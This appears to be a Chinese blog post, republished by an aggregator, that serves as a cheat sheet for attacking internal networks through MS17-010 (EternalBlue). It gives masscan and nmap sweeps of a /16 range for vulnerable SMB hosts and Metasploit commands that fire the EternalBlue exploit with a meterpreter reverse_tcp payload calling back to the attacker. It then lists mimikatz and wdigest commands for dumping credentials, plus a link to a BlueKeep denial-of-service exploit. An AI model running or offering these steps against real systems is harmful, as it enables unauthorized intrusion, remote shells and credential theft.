内网远程溢出漏洞利用
Posted 17bdw
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了内网远程溢出漏洞利用相关的知识,希望对你有一定的参考价值。
MS-17010
信息探测-参考资料
https://masterxsec.github.io/2017/05/27/Metasploit%E4%B8%AD%E7%9A%84MS17-010/
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
其他 exploit
https://github.com/jflyup/goMS17-010
也可以使用 msf 自带的 scanner 探测 auxiliary/scanner/smb/smb_ms17_010
sudo masscan -p445 192.168.1.1/16 > 445_open.txt
vi 445_open.txt [ctrl+v G wwww d :q]
nmap --script "smb-vuln-ms17*" -Pn -iL 445_open.txt > 17010.txt
Nmap 与 17010
nmap 192.168.1.1 --script smb-vuln-ms17-010
nmap 192.168.1.1 -Pn -sn --script smb-vuln-ms17-010
nmap -iL list.txt -Pn -sn --script smb-vuln-ms17-010
nmap --script "smb-vuln-ms17*" -Pn -iL 445_open.txt > 17010.txtMicrosoft Windows Remote Desktop - ‘BlueKeep‘ Denial of Service (Metasploit)
https://www.exploit-db.com/exploits/47120
漏洞利用-msfconsole
use exploit/windows/smb/ms17_010_eternalblue
show targets
set TARGET <target-id>
show options
# set payload windows/x64/meterpreter/reverse_tcp
# set payload windows/meterpreter/reverse_tcp
set RHOST <remote_host>
set LHOST <0.0.0.0>
options
exploitNmap编译
从源码编译 Nmap compile nmap
$ sudo apt-get install git wget build-essential checkinstall libpcre3-dev libssl-dev clang
$ git clone https://github.com/nmap/nmap.gitMeterpreter
msf>
load mimikatz
wdigest
screenshot
sysinfo以上是关于内网远程溢出漏洞利用的主要内容,如果未能解决你的问题,请参考以下文章
Adobe Reader 缓冲区溢出漏洞 (CVE-2010-2883)漏洞分析报告